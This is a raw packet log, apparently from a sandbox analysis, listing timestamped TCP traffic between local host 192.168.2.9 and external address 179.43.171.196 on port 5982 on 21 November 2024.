                                                                                                                                                              Nov 21, 2024 11:27:07.804786921 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.805481911 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.805536985 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.805629969 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.806360960 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.806406021 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.806538105 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.807347059 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.807398081 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.807399035 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.808154106 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.808206081 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.808267117 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.808967113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.809020042 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.809052944 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.809848070 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.809900999 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.809932947 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.810686111 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.810739040 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.810800076 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.811523914 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.811574936 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.811634064 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.812407017 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.812478065 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.812546968 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.813260078 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.813342094 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.813539028 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.814366102 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.814421892 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.814605951 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.815911055 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.815924883 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.815977097 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.816328049 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.816379070 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.816612005 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.817682981 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.817771912 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.817878962 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.818408966 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.818454027 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.818458080 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.818885088 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.819009066 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.819067955 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.819610119 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.819654942 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.819664001 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.820249081 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.820301056 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.820322990 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.820950031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.820998907 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.821032047 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.821805954 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.821858883 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.821923971 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.822688103 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.822765112 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.822793007 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.823522091 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.823568106 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.823673010 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.824395895 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.824435949 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.824470997 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.825267076 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.825393915 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.825793028 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.826265097 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.826284885 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.826354980 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.826936007 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.826981068 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.827045918 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.827869892 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.827918053 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.827939987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.828669071 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.828716993 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.828783035 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.829734087 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.829785109 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.829862118 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.830385923 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.830431938 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.830518961 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.831252098 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.831299067 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.831362009 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.832113028 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.832154036 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.832221985 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.832964897 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.833008051 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.833065987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.833851099 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.833899975 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.833924055 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.834664106 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.834712982 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.834768057 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.835473061 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.835614920 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.975688934 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.975807905 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.975895882 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.976066113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.976188898 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.976241112 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.976950884 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.977042913 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.977135897 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.977817059 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.977931976 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.977983952 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.978673935 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.978785038 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.978833914 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.979518890 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.979743958 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.979789972 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.980359077 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.980452061 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.980494022 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.988322020 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.988418102 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.988466978 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.988729954 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.988996029 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.989044905 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.989545107 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.989675045 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.989722013 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.990380049 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.990657091 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.990714073 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.990835905 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.991539001 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.991595030 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.991647959 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.992399931 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.992520094 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.992594957 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.993278027 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.993336916 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.993419886 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.994119883 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.994169950 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.994203091 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.995021105 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.995069027 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.995109081 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998240948 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998320103 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.998358965 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998364925 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998369932 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998416901 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.998456955 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998495102 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.998514891 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998518944 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998527050 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998564959 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.999495983 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.999547958 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.999619961 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.000149965 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.000193119 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.000206947 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.000987053 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.001095057 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.001127005 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.002321005 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.002363920 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.002474070 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.002685070 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.002815962 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.002875090 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.003521919 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.003566980 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.003602028 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.004371881 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.004426956 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.004443884 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.005279064 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.005326986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.005448103 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.006288052 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.006336927 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.006346941 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.006944895 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.007019043 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.007047892 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.007803917 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.007884979 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.007919073 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.008665085 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.008718967 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.008765936 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.009514093 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.009749889 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.009824038 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.010360956 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.010479927 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.010566950 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.011251926 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.011349916 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.011404037 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.012079000 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.012162924 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.012276888 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.012964010 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.013011932 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.013065100 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.013818026 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.013880014 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.013930082 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.014672041 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.014719009 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.014775991 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.015541077 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.015584946 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.015646935 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.016370058 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.016423941 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.016474009 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.017232895 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.017311096 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.017345905 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.018131971 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.018182039 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.018194914 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.018949986 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.018997908 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.019069910 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.019814968 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.019861937 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.019942999 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.020682096 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.020751953 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.020777941 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.021569014 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.021610022 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.021655083 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.022378922 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.022494078 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.022521019 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.023231030 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.023299932 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.023339987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.024122000 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.024172068 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.024187088 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.024961948 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.025007963 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.025068045 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.025829077 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.025873899 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.025945902 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.026691914 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.026737928 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.026817083 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.027498960 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.027548075 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.167733908 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.167829990 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.167913914 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.168124914 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.168239117 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.168284893 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.169011116 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.169114113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.169167995 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.169851065 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.169958115 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.170159101 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.170691013 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.170794964 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.170845032 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.171581984 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.171633005 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.172193050 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.172421932 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.172502995 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.172549963 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.180310011 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.180449963 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.180504084 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.180671930 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.180803061 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.180876017 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.181555033 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.181668043 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.181873083 CET497185982192.168.2.9179.43.171.196
